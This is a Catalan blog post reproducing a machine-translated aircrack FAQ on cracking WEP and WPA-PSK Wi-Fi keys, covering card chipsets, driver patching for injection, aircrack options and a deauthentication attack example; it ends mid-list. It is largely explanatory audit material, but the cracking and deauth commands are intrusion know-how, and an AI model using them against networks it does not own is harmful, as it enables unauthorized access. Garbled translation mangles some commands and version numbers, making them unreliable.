El Blog de Vinsentvega ;)

Un blog de tot un poc

Aircrack

Posted by VinsentVega a 8 Novembre 2010


Què és aircrack?

aircrack és una col lecció d’eines per a l’auditoria de xarxes sense fils:

  • airodump: programa per a la captura de paquets 802.11
  • aireplay: programa per a la injecció de paquets 802.11
  • aircrack: crackeador de claus estàtiques WEP i WPA-PSK
  • airdecap: desxifra arxius de captures WEP / WPA

Hi ha un fòrum de discussió?

És clar: http://100h.org/forums/. Mira també # aircrack a irc.freenode.net

On puc descarregar aircrack?

La descàrrega oficial es troba en http://www.cr0.net:8040/code/network/. De qualsevol manera, si per qualsevol motiu no tens accés al port 8040, pots utilitzar també aquest mirror: http://100h.org/wlan/aircrack/.Aircrack està inclòs en el Troppix LiveCD, que inclou els controladors {Prism2 / PrismGT / Realtek / Atheros / Ralink} “parxeat” per a la injecció de paquets, així com els controladors acx100 i ipw2200 (Centrino b / g).

Rebut el missatge “cygwin1.dll not found” quan inici aircrack.exe.

Pots descarregar aquesta llibreria de:http://100h.org/wlan/aircrack/.Per utilitzar aircrack, arrossega el / s fitxer (s) de captura. Cap o. IVS sobre aircrack.exe. Si vols passar-li opcions al programa hauràs obrir una consola de comandes (cmd.exe) i introduir-les manualment, també hi ha una GUI per aircrack, desenvolupada per hexanium.

C: \ TEMP> aircrack.exe-n 64-f 8 out1.cap out2.cap

Més avall trobaràs una llista d’opcions.

Com crackeo una clau WEP estàtica?

La idea bàsica és capturar tant trànsit encriptat com sigui possible utilitzant airodump. Cada packet de dades WEP té associat un Vector d’Inicialització (IV) de 3-bytes: després de recollir un nombre suficient de paquets de dades, executa aircrack sobre l’arxiu de captura resultant. Llavors aircrack s’executarà un conjunt d’atacs de tipus estadístic desenvolupats per un talentós hacker anomenat Korek.

Com sé si el meu clau WEP és la correcta?

Hi ha dues maneres d’autenticació WEP:

  • Open-System Authentication: Aquest és el predeterminadoEl AP accepta tots els clients, i mai comprova la clau: sempre concedeix l’associació. De tota manera, si la teva clau és incorrecta no podràs rebre o enviar paquets (perquè fallarà la desencriptació), i Pot tant DHCP, ping, etc. acabaran interrompent.
  • Shared-Key Authentication: el client ha de xifrar la petició abans que li sigui concedida l’associació per l’AP. Aquesta manera té falles i provoca la recuperació de la clau, de manera que mai està activat de manera predeterminada.

En resum, només perquè sembli que et connectes de manera satisfactòria a l’AP-no vol dir que el teu clau WEP sigui la correcta! Per comprovar la teva clau WEP, procura desencriptar un arxiu de captura amb el programa airdecap.

Quants IVs es necessiten per crackejar WEP?

El crackeo WEP no és una ciència exacta. El nombre de IVs necessaris depèn de la longitud de la clau WEP, i també de la sort. Normalment, una clau WEP de 40 bits pot ser crackejat amb 300.000 IVs, i una de 104-bit amb 1.000.000 d’IVs; tenint mala sort es poden necessitar dos milions d’IVs, o més.No hi ha cap manera de saber la longitud de la clau WEP: aquesta informació està oculta i mai és anunciada, guardada bé en packet de gestió, bé en paquets de dades, com a conseqüència, airodump no pot reportar la longitud de la clau WEP. Per aquest motiu, es recomana executar aircrack dues vegades: quan tens 250.000 IVs, inicies aircrack amb “-n 64” per crackejar la WEP de 40 bits. Si no la treus, tornes a iniciar aircrack (sense l’opció-n) per crackejar la WEP de 104 bits.

Sembla que no aconsegueixo IVs!

Possibles motius:

  • Et trobes massa lluny del punt d’accés.
  • No hi ha trànsit a la xarxa escollida.
  • Hi ha tràfic de tipus G però estàs capturant en mode B.
  • Hi ha algun problema amb la targeta (problema de firmware?)

Els beacons només són “paquets anunci” sense xifrar. No serveixen per al crackeo WEP.

No he pogut crackejar aquest AP!

Shit happens.

Per què no hi ha una versió de aireplay per a Windows?

El controlador PEEK no suporta la injecció de paquets 802.11; No portaré aireplay a Win32. De tota manera, hi ha alternatives comercials:Targetes Prism: http://www.tuca-software.com/transmit.php

Targetes Atheros: http://www.tamos.com/htmlhelp/commwifi/pgen.htm

És compatible la meva targeta amb airodump / aireplay?

Abans de res, busca a Google per esbrinar quin és el chipset de la targeta. Per exemple, si tens una Linksys WPC54G busca per “wpc54g chipset linux“.

Chipset Suportat per airodump a Windows? Suportat per airodump a Linux? Suportat per aireplay a Linux?
HermesI SÍ (Controlador Agere) SÍ (Controlador orinoco“parxeat”) NO (el firmware corromp la capçalera de la MAC)
Prism2 / 3 NO, pots buscar a LinkFerret una alternativa SÍ (controlador HostAP o wlan-ng ), microprogramari STA 1.5.6 o més nou necessari SÍ (PCI i CardBus només, es recomana posar pegats el controlador)
PrismGT SÍ (Controlador PrismGT) FullMAC: SÍ (controlador prism54, SoftMAC: ENCARA NO (prism54usb) SÍ (es recomana posar pegats el controlador)
Atheros CardBus: Sí (Controlador Atheros), PCI: NO (mira CommView WiFien el seu lloc) Sí (PCI i CardBus només, controlador madwifi) SÍ (cal “parxear” el controlador)
RTL8180 SÍ (controlador Realtek) SÍ (rtl8180-sa2400 controlador) INESTABLE (cal  el controlador)
Aironet ¿SI? (controlador Cisco) SÍ (controlador Airoes recomana la versió 1930.04.25 del firmware) NO (problemes de firmware)
Ralink NO SÍ (controlador rt2500 / rt2570) SÍ (cal “parxear” el controlador)
Centrino b NO PARCIAL: el controlador ipw2100 no descarta els paquets corruptes NO
Centrino b / g NO SÍ (controlador ipw2200es recomana la versió 1.0.6) NO (el firmware rebutja paquets)
Broadcom Només els models antics (Controlador BRCM) NO PROVAT (controlador bcm43xx, necessari Linux> = 1914.06.02) NO
TI (ACX100 / ACX111) NO ALFA (controlador acx100) NO
ZyDAS 1201 NO ENCARA NO (Controlador zd1211) NO
Atmel, Marvel NO DESCONEGUT NO

El controlador PEEK no reconeix la meva targeta.

Els controladors de Windows dalt esmentats no reconeixen algunes targetes, fins i tot tenint el chipset correcte. En aquest cas, obre l’administrador de dispositius, selecciona la teva targeta, “Actualitzar el controlador, seleccioneu” Instal lar des d’una ubicació coneguda, seleccioneu “No cercar, seleccionaré el controlador a instal lar”, fes clic a “Utilitzar disc”, introdueix la ruta on ha estat descomprimit el fitxer, deselecciona “Mostra maquinari compatible”, i tria el controlador.

Tinc una targeta Prism2, però airodump / aireplay sembla no funcionar!

Primer pas, assegura’t que no estàs fent servir el controlador orinoco. Si el nom d’interfície és wlan0, llavors el controlador és HostAP o wlan-ng. Si el nom de la interfície és eth0 o eth1, llavors el controlador és orinoco i has de deshabilitar (usa cardctl per esbrinar l’identificador de la targeta, llavors edita / etc / pcmcia / config, reemplaça orinoco_cs per hostap_cs i reinicia cardmgr).També pot ser un problema de microprogramari. Els firmwares antics presenten problemes amb el test model 0x0A (usat pels pegats per a la injecció amb HostAP / wlan-ng), per tant assegura’t que el teu està al dia – mira les instruccions més avall. La versió recomanada de firmware per a l’estació és la 1.7.4. Si no funciona bé (Kismet o airodump esclaten després de capturar un parell de paquets), prova amb la STA 1.5.6 (o bé s1010506.hex per a les targetes Prism2 més antigues, o sf010506.hex per les més noves).

Com a nota aclaridora, test model 0x0A és una cosa inestable amb wlan-ng. Si la targeta sembla barrar, hauràs de reset, o fer servir HostAP al seu lloc. La injecció sobre dispositius USB Prism2 està actualment trencada amb wlan-ng.

Nota: Aquí podeu trobar un controlador per Prism2 sota Windows XP per a targetes amb suport per a WPA / TKIP: http://100h.org/wlan/winxp/wpc11v3.0_wpa_dr.exe.

Tinc una targeta Atheros, i el pegat madwifi provoca una fallada en el nucli /
aireplay diu: enhanced RTC support isn’t available.

Hi ha alguns problemes amb algunes versions de la branca 2.6 de Linux (especialment anteriors al 1911.02.06) que provocaran un nucli panic a l’injectar amb madwifi. També, en molts nuclis 06/02 el suport per RTC millorat està simplement trencat. Per tant, està altament recomanat utilitzar un Linux 2.6.11.x o més nou.

Com actualitzo el firmware del meu Prism2?

La manera més senzilla d’actualitzar mitjançant WinUpdate – per això és necessari tenir instal.lat el controlador WPC11 v2.5. Tots dos es poden obtenir de: http://100h.org/wlan/linux/prism2/.També es pot actualitzar el firmware amb el “parxe”HostAP (mira més avall les instruccions sobre com posar el “parxe” e instal lar HostAP). Alternativament, pots arrencar el Troppix Live CD (el qual conté un controlador hostap ja “parxeat” i la utilitat prism2_srec).

Ara que el HostAP està carregat, pots comprovar el firmware del teu primari i de l’estació amb aquesta comanda:

# Dmesg | grep wifi hostap_cs: Registered netdevice wifi0 wifi0: NIC: id = 0x800c v1.0.0 wifi0: PRI: id = 0x15 v1.1.1  (primary firmware is 1.1.1)
wifi0: STA: id = 0x1f v1.7.4  (station firmware is 1.7.4)
wifi0: registered netdevice wlan0

Si el seu identificador de NIC es troba entre 0x8002 i 0x8008, en aquest cas tens una Prism2 antiga i HAS utilitzar microprogramari STA en la seva versió 1.5.6 (s1010506.hex). En cas contrari, hauries de fer servir PRI 1.1.1 / STA 1.7.4 que és la versió de firmware més estable per a les targetes Prism2 més noves. NO facis servir firmware 1.7.1 o 1.8.x, la gent ha reportat problemes usant-los.

Per actualitzar el firmware, necessitaràs prism2_srec del paquet hostap-utils, si no es troba ja en el sistema, descàrrega i compila hostap-utils:

wget http://100h.org/wlan/linux/prism2/hostap-utils-0.4.0.tar.gz tar-xvzf hostap-utils-0.4.0.tar.gz cd hostap-utils-0.4.0 make

Algunes targetes Prism2 han estat restringides a un cert conjunt de canals degut a regulacions nacionales.Puedes activar els 14 canals amb els següents comandaments:

./prism2_srec wlan0-D> pda; curt pda pda.bak
Edit pda and put 3FFF at offset 0104 (line 24)

Finalment, descarrega el firmware i Flasheo la targeta. Si el seu identificador de NIC està entre 0x8002 i 0x8008:

wget http://100h.org/wlan/linux/prism2/s1010506.hex ./prism2_srec-v-f wlan0 s1010506.hex-P pda

En cas contrari:

wget http://100h.org/wlan/linux/prism2/pk010101.hex wget http://100h.org/wlan/linux/prism2/sf010704.hex ./prism2_srec-v-f wlan0 pk010101.hex sf010704.hex -P pda

Si reps el missatge “ioctl [PRISM2_IOCTL_HOSTAPD]: Operation not supported“, el controlador HostAP no està carregat i has instal. Si reps el missatge “ioctl [PRISM2_IOCTL_DOWNLOAD]: Operation not supported“, llavors la teva controlador HostAP no ha estat “parxeada” per suportar la descàrrega no-volàtil.

Quina targeta comprar?

El millor chipset a dia d’avui és Atheros; està molt bé a tots dos Windows i Linux. L’últim pegat madwifi fa possible injectar en brut paquets 802.11 tant en mode Infraestructura (Managed) com Monitor a velocitats b / g.Ralink fa bons xipsets, i ha estat molt cooperatiu amb la comunitat open-source per a desenvolupar controladors GPL. Ara la injecció de paquets està completament suportada amb Linux amb targetes PCI / PCMCIA RT2500, i també funciona en dispositius USB RT2570.

Aquí hi ha una llista de targetes recomanades:

Card name Type Chipset Antenna Preu Suport a Windows Suport a Linux
MSI PC54G2 PCI Ralink RP-SMA E30 No
MSI CB54G2 CardBus Ralink Interna E30 No
Linksys WMP54G v4 PCI Ralink RP-SMA E40 No
Linksys WUSB54G v4 USB Ralink Interna E40 No
D-Link DWL-G122 USB Ralink Interna E45 No
Netgear WG111 USB PrismGT SoftMAC Interna E40 airodump No
Netgear WG311T PCI Atheros RP-SMA E50 CommView WiFi
Netgear WG511T CardBus Atheros Interna E50 airodump
Netgear WAG511 CardBus Atheros Interna E100 airodump
Proxim 8470-WD CardBus Atheros MC + Int E110 airodump

Nota: hi ha alguns models més barats amb nom semblant (WG511, WG311, DWL-650 + i DWL-G520 +); aquestes targetes no estan basades en Atheros . A més, el controlador Peek no suporta les targetes Atheros recents, per la qual cosa hauràs de fer servir CommView WiFi al seu lloc.

Com ús airodump a Windows?

Abans de res, assegura’t que la teva targeta és compatible (mira la taula de més amunt) i que tens instal lat el controlador adequat. També has de descarregar peek.dll i peek5.sys i posar-los al mateix directori que airodump.exe.A l’hora d’executar airodump, hauries d’especificar:

  • El número identificador de la interfície de xarxa, que ha de ser elegit de la llista mostrada per airodump.
  • El tipus d’interfície de xarxa (‘o’ per HermesI i Realtek, ‘a’ per Aironet i Atheros).
  • El nombre de canal, entre 1 i 14. També pots especificar 0 per alten entre tots els canals.
  • El prefix de sortida. Per exemple, si el prefix és “foo”, llavors airodump crearà foo.cap (paquets capturats) i foo.txt (estadístiques CSV). Si foo.cap existeix, airodump continuarà la captura afegint els paquets.
  • L’opció “només IVs”. Ha de ser 1 si només vols guardar els IVs dels paquets de dades WEP. Això estalvia espai, però l’arxiu resultant (foo.ivs) només serà útil per al crackeo WEP.

Per parar de capturar paquets premeu Ctrl-C. Potser et surti una pantalla blava, a causa d’un error en el controlador PEEK per no sortir netament de manera monitor. També pot ser que l’arxiu resultant de la captura està buit. La causa d’aquest error és desconeguda.

Per què no puc compilar airodump i aireplay en BSD / Mac OS X?

Ambdues fonts, de airodump i aireplay són específiques de linux. No hi ha plans de portades a altres sistemes operatius.

Com ús airodump en Linux?

Abans d’executar airodump, has d’iniciar l’script airmon.sh per llistar les interfícies sense fils detectades.

  ús: airodump <interfaz o arxiu pcap> <prefijo de salida> [canal] [opció IVs] Especifica 0 com a canal per anar dels canals de la banda dels 2.4 GHz Passa l'opció dels IVs a 1 per guardar només els IVs capturats - l'arxiu resultant val per al crackeo WEP. Si el dimoni gpsd es troba funcionant, airodump recollirà i guardarà les coordenades GPS en format de text.

Pots convertir un arxiu. Cap /. Dump a format. IVS amb el programa pcap2ivs (linux només).

Airodump oscil.la entre WEP i WPA.

Això passa quan el teu controlador no rebutja els paquets corruptes (els que tenen CRC invàlid). Si és un Centrino b, simplement no té solució, veu i compra una targeta millor. Si és una Prism2, prova a actualitzar el microprogramari.

Quin és el significat dels camps mostrats per airodump?

airodump mostrarà una llista amb els punts d’accés detectats, i també una llista de clients connectats o estacions (“stations”). Aquí hi ha un exemple d’una captura de pantalla usant una targeta Prism2 amb HostAP:

 BSSID PWR Beacons # Data CH MB ENC ESSID 00:13:10:30:24:9 C 46 15 3416 6 54. WEP the ssid 00:09:5 B: 1F: 44:10 36 54 0 11 11 OPN NETGEAR BSSID STATION PWR Packets Probes 00:13:10:30:24:9 C 00:09:5 B: EB: C5: 2B 48719 the ssid 00:13:10:30:24:9 C 00:02:2 D: C1: 5D: 1F 190 17 the ssid
Field Description
BSSID Adreça MAC del punt d’accés.
PWR Nivell de senyal reportat per la targeta. El seu significat depèn del controlador, però a mesura que t’acostes al punt d’accés oa l’estació del senyal augmenta. Si PWR == -1, el controlador no suporta reportar el nivell de senyal.
Beacons Nombre de paquets-anunci enviats per l’AP. Cada punt d’accés envia uns deu Beacons per segon al ritme (rate) mínim (1M), pel que normalment poden ser recollits des de molt lluny.
# Data Nombre de paquets de dades capturades (si és WEP, només compta IVs), incloent paquets de dades de difusió general.
CH Nombre de canal (obtingut dels paquets beacon). Nota: algunes vegades es capturen paquets de dades d’altres canals encara que no s’estigui alternant entre canals a causa de les interferències de radiofreqüència.
MB Velocitat màxima suportada per l’AP. Si MB = 11, llavors es tracta de 802.11b, si MB = 22 llavors és 802.11b + i velocitats més grans són 802.11g.
ENC Algoritme d’encriptació en ús. OPN = sense encriptació, “WEP?” = WEP o major (no hi ha prou dades per distingir entre WEP i WPA), WEP (sense la interrogació) indica WEP estàtica o dinàmica, i WPA si TKIP o CCMP són presents.
ESSID Coneguda com “SSID”, pot estar buida si l’ocultació de SSID està actiu. En aquest cas airodump tractarà de recuperar el SSID de les respostes a escanejats i les peticions d’associació.
STATION Adreça MAC de cada estació associada. A la captura de més amunt s’han detectat dos clients (00:09:5 B: EB: C5: 2B i 00:02:2 D: C1: 5D: 1F).

Com un dos arxius de captura?

Pots fer servir el programa mergecap (part del paquet ethereal-common o la distribució win32):mergecap-w out.cap test1.cap test2.cap test3.cap

Es pot unir arxius. IVS amb el programa “mergeivs” (Linux només).

Puc utilitzar Ethereal per capturar paquets 802.11?

Sota Linux, simplement prepara la targeta per a manera Monitor amb l’script airmon.sh. Sota Windows, Ethereal NO POT capturar paquets 802.11.

Pot Ethereal descodificar paquets de dades WEP?

Sí Ves a Edita -> Preferències -> Protocols -> IEEE 802.11, seleccioneu 1 a la “WEP key count” i introdueix el teu clau WEP sota.

Com puc canviar la meva adreça MAC?

Aquesta operació només és possible sota Linux. Per exemple, si tens una targeta Atheros:

ifconfig ath0 down ifconfig ath0 hw ether 00:11:22:33:44:55 ifconfig ath0 up

Si no funciona, intenta treure i re-inserir la targeta.

Com ús aircrack?

Usage: aircrack [options] <capture file(s)>Pots especificar múltiples fitxers d’entrada (tant en format. Cap com. IVS). També pot executar airodump i aircrack al mateix temps: aircrack s’auto-s’actualitzarà quan hi hagi nous IVs disponibles.

Aquí hi ha un sumari amb totes les opcions disponibles:

Opció Param. Descripció
-A A tall Força el tipus d’atac (1 = WEP estàtica, 2 = WPA-PSK).
-I essid Si s’especifica, es faran servir tots els IVs de les xarxes amb el mateix ESSID. Aquesta opció és necessària en el cas que el vostre Wireless no estigui obertament difós en un crackeo WPA-PSK (ESSID ocult).
-B BSSID Selecciona la xarxa triada basant-se en l’adreça MAC.
-P nbcpu En sistemes SMP especifica amb aquesta opció el nombre de CPUs.
-Q none Activa el mode silenciós (no mostra l’estat fins que la clau és o no trobada).
-C none (Crackeig WEP) Limita la cerca a caràcters alfanumèrics només (0x20 – 0x7F).
-D start (Crackeig WEP) Especifica el començament de la clau WEP (en hex), usat per a depuració.
-M maddr (Crackeig WEP) Direcció MAC per a la qual filtrar els paquets de dades WEP. Alternativament, especifica-m ff: ff: ff: ff: ff: ff per utilitzar tots i cadascun dels IVs, indiferentment de la xarxa que sigui.
-N nbits (Crackeig WEP) Especifica la longitud de la clau: 64 per a WEP de 40 bits, 128 per a WEP de 104 bits, etc. Per omissió és 128.
-I index (Crackeig WEP) Conserva només els IVs que tenen aquest índex de clau (1 a 4). El comportament per defecte és ignorar l’índex de la clau.
-F Fudge (Crackeig WEP) Per defecte, aquest paràmetre està establert en 2 per WEP de 104 bits i en 5 per WEP de 40 bits. Especifica un valor més alt per elevar el nivell de força bruta: el crackeo portarà més temps, però amb una major possibilitat d’èxit.
-K Korek (Crackeig WEP) Hi ha 17 atacs de tipus estadístic de Korek. De vegades un atac crea un enorme fals positiu que evita que s’obtingui la clau, fins i tot amb grans quantitats de IVs. Prova-k 1,-k 2, … -K 17 per anar desactivant cadascun dels atacs de forma selectiva.
-X none (Crackeig WEP) No aplicar força bruta sobre els dos últims keybytes.
-I none (Crackeig WEP) Aquest és un atac de força bruta experimental únic que hauria de ser usat quan el mètode normal d’atac falli amb més d’un milió de IVs.
-W words (WPA cracking) Ruta cap a la llista de paraules.

Podries implementar una opció per a reprendre en aircrack?

No hi ha plans d’implementar aquesta capacitat.

Com puc crackejar una xarxa WPA-PSK?

Has capturar fins que es produeixi un “salutació” (handshake) entre un client sense fils i el punt d’accés. Per forçar el client a reautenticarse podeu iniciar un atac de deautenticación amb aireplay. També és necessari un bon diccionari; veure
http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/Per la teva informació. No és possible pre-computar grans taules de Pairwise Màster Keys com fa rainbowcrack, ja que la contrasenya està barrejada amb el vostre Wireless.

Serà crackejat WPA en el futur?

És extremadament improbable que WPA sigui crackejat de la manera que ho ha estat WEP.El major problema de WEP és que la clau compartida està adjunta al IV, el resultat està vinculat directament amb el RC4. Aquesta construcció simple superposada és propensa a un estany de tipus estadístic, ja que els primers bytes del text xifrat estan fortament correspostos amb la clau compartida (veure el paper d’Andrew Roos). Hi ha bàsicament dos contramesures a aquest atac: 1. barrejar el IV i la clau compartida utilitzant una funció per a la codificació o 2. descartar els primers 256 bytes de la sortida del RC4.

Hi ha hagut alguna desinformació en les notícies sobre les falles de TKIP:

Per ara, TKIP és raonablement segur per si mateix vivint un temps prestat ja que es recolza en el mateix algoritme RC4 en què es va recolzar WEP.

Realment, TKIP (WPA1) no és vulnerable: per a cada paquet, el IV de 48-bit està barrejat amb la clau temporal pairwise de 128-bit per a crear una clau RC4 de 104 bits, de manera que no hi ha cap correlació de tipus estadístic. És més, WPA proporciona contramesures davant atacs actius (reinjecció de trànsit), inclou un missatge d’integritat de codi més fort (michael), i té un protocol de autenticacaión molt robust (“salutació” de 4 fases). L’única vulnerabilitat a tenir en compte és l’atac amb diccionari, que falla si la contrasenya és prou robusta.

WPA2 (aka 802.11i) és exactament el mateix que WPA1, excepte que utilitza CCMP (//// AES in counter model ////) en lloc de RC4 i HMAC-SHA1 en lloc de HMAC-MD5 per al EAPOL MIC. Com a apunt final, WPA2 és una mica millor que WPA1, però cap dels dos serà crackejat en un futur proper.

Tinc més d’un milió de IVs, però aircrack no troba la clau!

Possibles motius:

  • Mala sort: necessites capturar més IVs. normalment, una WEP de 104 bits pot ser cracker amb aproximadament un milió de IVs, encara que de vegades es necessiten més IVs.
  • Si tots els vots (votes) semblen iguals, o si hi ha molts vots negatius, llavors l’arxiu amb la pesca és corrupte, o la clau no és estàtica (s’està fent servir EAP/802.1X?).
  • Un fals positiu va evitar que s’obtingués la clau. Prova a desactivar cada atac Korek (-k 1 .. 17), puja el nivell de força bruta (-f) o prova amb l’atac invers experimental únic (-i).

He trobat una clau, com desxifra un arxiu de captura?

Pots fa servir el programa airdecap :

  ús: airdecap [opcions] <fitxer pcap>-l: no elimina la capçalera del 802.11-b BSSID: filtre de direcció MAC del punt d'accés-k PMK: WPA Pairwise Màster Key en hex-i essid: Identificador a ascii de la xarxa escollida-p pass: contrasenya WPA de la xarxa escollida-w key: clau WEP de la xarxa escollida en hex exemples: airdecap-b 00:09:5 B: 10: BC: 5A open-network.cap airdecap-w 11A3E229084349BC25D97E2939 WEP . cap airdecap-i "el ssid"-p contrasenya tkip.cap

Com recupero la meva clau WEP en Windows?

Pots utilitzar el programa WZCOOK que recupera les claus WEP de la utilitat de XP Wireless Zero Configuration. Aquest és un programari experimental, de manera que potser funcioni i potser no, depenent del nivell de service pack que tinguis.

Està retornant WZCOOK també claus WPA?

WZCOOK mostrarà el PMK (Pairwise Màster Key), un valor de 256 bits que és el resultat de codificar 8192 vegades la contrasenya junt amb el vostre Wireless i la longitud del ESSID. La contrasenya en si no es pot recuperar – de totes maneres, només cal conèixer el PMK per connectar amb una xarxa sense fils protegida mitjançant WPA amb wpa_supplicant (veure el Windows README). El teu fitxer de configuració wpa_supplicant.conf hauria de quedar així:network = {
ssid = “mi_essid”
PMK = 5c9597f3c8245907ea71a89d […] 9d39d08e
}

Com pose el “parxe” per al controlador per a la injecció amb aireplay?

Fins ara, aireplay només suporta la injecció amb Prism2, PrismGT (FullMAC), Atheros, RTL8180 i Ralink. La injecció amb Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell i Broadcom no està suportada a causa de limitacions en firmware i / o controlador .La injecció amb Prism2 i Atheros és encara força experimental, si la teva targeta sembla penjar (sense paquets capturats o injectats), desactiva la interfície, torna a carregar els controladors i reinsereix la targeta. Considera també actualitzar el firmware (si és Prism2).

Tots els controladors han de ser “parxeats” per d’aquesta manera suportar la injecció en mode Monitor. Necessitaràs les capçaleres linux (linux headers) que coincideixin amb el nucli que estiguis utilitzant, si no, hauràs de descarregar les funentes de linux i compilar un nucli personalitzat.

Si tens problemes pel que fa al “parxe” i compilació, pot ser que vulguis fer servir el Troppix LiveCD, el qual inclou controladors “parxeats” per als dispositius.

  • Instal lació del controlador madwifi (Targetes Atheros)Nota 1: necessitaràs uudecode del paquet sharutils.Nota 2: el pegat 20051008 hauria de funcionar també amb versions més recents del CVS de madwifi.Nota 3: si fas servir wpa_supplicant, hauries de recompilar (les verisones antigues no són compatibles amb el CVS actual de madwifi), i assegurar-te que CONFIG_DRIVER_MADWIFI = i no està comentat en config.h.Nota 4: amb el madwifi actual, ja no serà necessari executar “iwpriv ath0 mode 2“, ja que el controlador permet la injecció en mode 0 utilitzant la nova interfície athXraw.
    Modes Permesos Medi Físic
    Mode 0 Automàtic (a / b / g)
    Mode 1 802.11a només
    Mode 2 802.11b només
    Mode 3 802.11g només
    ifconfig ath0 down rmmod wlan_wep ath_rate_sample ath_rate_onoe \ ath_pci wlan ath_hal 2> / dev / null find / lib / modules-name 'ath *'-exec rm-v {} \; 2> / dev / null find / lib / modules-name 'wlan *'-exec rm-v {} \; 2> / dev / null cd / usr / src wget http://100h.org/wlan/linux/atheros/madwifi-cvs-20051025.tgz wget http:// / 100h.org/wlan/linux/patches/madwifi-cvs-20051025.patch tar-xvzf madwifi-cvs-20051025.tgz cd madwifi-cvs-20051025 patch-Np1-i ../madwifi-cvs-20051025.patch make KERNELPATH = / usr/src/linux- <Inserta version> make install modprobe ath_pci

    Ara és possible establir el ritme de transmissió (rate) amb madwifi (i també amb rt2570). El valor recomanat és 5.5 Mbps, però pots reduir-lo o incrementar-lo en funció de la distància a la qual es trobi el AP. Per exemple:

    iwconfig ath0 rate 24M
    Modulat Velocitats Permeses
    DSSS / CCK 1M, 2M, 5.5m, 11M
    OFDM (a / g) 6M, 9M, 12M, 24M, 36m, 48M, 54m

    Durant els atacs 2, 3 i 4, canviar el nombre de paquets per segon enviats per aireplay (opció-x) de vegades ajuda a obtenir millors resultats, el predeterminat és 500 pps.

  • Instal lació del controlador prism54 (targetes PrismGT FullMAC)
    ifconfig eth1 down rmmod prism54 cd / usr / src wget http://100h.org/wlan/linux/prismgt/prism54-svn-20050724.tgz wget http://100h.org/wlan/linux/patches/prism54-svn -20050724.patch tar-xvzf prism54-svn-20050724.tgz cd prism54-svn-20050724 patch-Np1-i ../prism54-svn-20050724.patch make modules & & make install wget http://100h.org/wlan / linux/prismgt/1.0.4.3.arm mkdir-p / usr / lib / hotplug / firmware mkdir-p / lib / firmware cp 1.0.4.3.arm / usr/lib/hotplug/firmware/isl3890 mv 1.0.4.3.arm / lib/firmware/isl3890 depmod-a
  • Instal lació del controlador HostAP (targetes Prism2)
    ifconfig wlan0 down wlanctl-ng wlan0 lnxreq_ifstate ifstate = disable / etc / init.d / pcmcia stop rmmod prism2_pci rmmod hostap_pci cd / usr / src wget http://100h.org/wlan/linux/prism2/hostap-controlador-0.4. 5.tar.gz wget http://100h.org/wlan/linux/patches/hostap-controlador-0.3.9.patch tar-xvzf hostap-controlador-0.4.5.tar.gz cd hostap-controlador-0.4. 5 patch-Np1-i ../hostap-controlador-0.3.9.patch make & & make install mv-f / etc / pcmcia / wlan-ng.conf / etc / pcmcia / wlan-ng.conf ~ / etc / init .d / pcmcia start modprobe hostap_pci &> / dev / null
  • Instal lació del controlador wlan-ng (Prism2 cards)Nota important: en inserir la targeta, wlan-ng flashejar el firmware a la RAM (descàrrega volàtil) amb les versions PRI 1.1.4 i STA 1.8.3. Molts usuaris van tenir problemes amb aquesta operació, de manera que en aquest cas és millor utilitzar hostap al seu lloc. A més, HostAP funciona de manera més fiable i suporta iwconfig mentre que wlan-ng no.
    ifconfig wlan0 down wlanctl-ng wlan0 lnxreq_ifstate ifstate = disable / etc / init.d / pcmcia stop rmmod prism2_pci rmmod hostap_pci find / lib / modules \ (-name p80211 *-o-name prism2 * \) \-exec rm-v { } \; cd / usr / src wget http://100h.org/wlan/linux/prism2/wlanng-0.2.1-pre26.tar.gz wget http://100h.org/wlan/linux/patches/wlanng -0.2.1-pre26.patch tar-xvzf wlanng-0.2.1-pre26.tar.gz cd wlanng-0.2.1-pre26 patch-Np1-i ../wlanng-0.2.1-pre26.patch make config & & make all & & make install mv / etc / pcmcia / hostap_cs.conf / etc / pcmcia / hostap_cs.conf ~ / etc / init.d / pcmcia start modprobe prism2_pci &> / dev / null
  • Instal lació del controlador r8180-sa2400 (targetes RTL8180)
    ifconfig wlan0 down rmmod r8180 cd / usr / src wget http://100h.org/wlan/linux/rtl8180/rtl8180-0.21.tar.gz wget http://100h.org/wlan/linux/patches/rtl8180-0.21 . patch tar-xvzf rtl8180-0.21.tar.gz cd rtl8180-0,21 patch-Np1-i ../rtl8180-0.21.patch make & & make install depmod-a modprobe r8180
  • Instal lació del controlador rt2500 (Ralink b / g PCI / PCMCIA)
    ifconfig ra0 down rmmod rt2500 cd / usr / src wget http://100h.org/wlan/linux/ralink/rt2500-cvs-20051112.tgz tar-xvzf rt2500-cvs-20051112.tgz cd rt2500-cvs-20051112 cd Module make & & make install modprobe rt2500

    Assegura’t de carregar el controlador amb modprobe (no insmod) i de posar la targeta en mode Monitor abans d’aixecar la interfície.

  • Instal lació del controlador rt2570 (Ralink b / g USB)
    ifconfig rausb0 down rmmod rt2570 cd / usr / src wget http://100h.org/wlan/linux/ralink/rt2570-cvs-20051112.tgz tar-xvzf rt2570-cvs-20051112.tgz cd rt2570-cvs-20051112 cd Module make & & make install modprobe rt2570

El controlador no compila.

Això normalment passa quan les capçaleres no coincideixen amb el nucli que estàs utilitzant. En aquesta situació simplement compileu un kernel nou, instal · la i reinicia. Després, prova una altra vegada a compilar-.Veure aquest HOWTO per a més detalls sobre com compilar el nucli.

Com ús aireplay?

Si el controlador està correctament “parxeat”, aireplay és capaç d’injectar paquets 802.11 en mode Monitor en brut; actualment implementa un conjunt de 5 atacs diferents.Si reps el missatge “ioctl (SIOCGIFINDEX) failed: No such device“, revisa que el nom del teu dispositiu és correcte i que ho has oblidat un paràmetre en la línia d’ordres.

En els següents exemples, 00:13:10:30:24:9 C és l’adreça MAC del punt d’accés (al canal 6), i 00:09:5 B: EB: C5: 2B és l’adreça MAC d’un client sense fils.

  • Atac 0: deautenticaciónAquest atac és probablement el més útil per recuperar un ESSID ocult (no difós) i per capturar “salutacions” WPA forçant als clients a reautenticarse. També pot ser usat per generar peticions ARP en tant que els clients Windows de vegades buiden la seva memòria cau de ARP quan són desconnectats. Per descomptat, aquest atac és totalment inservible si no hi ha clients associats.Normalment és més efectiu fixar com a blanc una estació específica usant el paràmetre-c.Alguns exemples:
    • Captura del “salutació” WPA una Atheros
      airmon.sh start ath0 airodump ath0 out juny  (canvia a una altra consola)
      aireplay -0 5-a 00:13:10:30:24:9 C-c 00:09:5 B: EB: C5: 2B ath0
      (espera uns segons )
      aircrack-w / path / to / diccionari out.cap
    • Generar peticions ARP amb una targeta Prism2
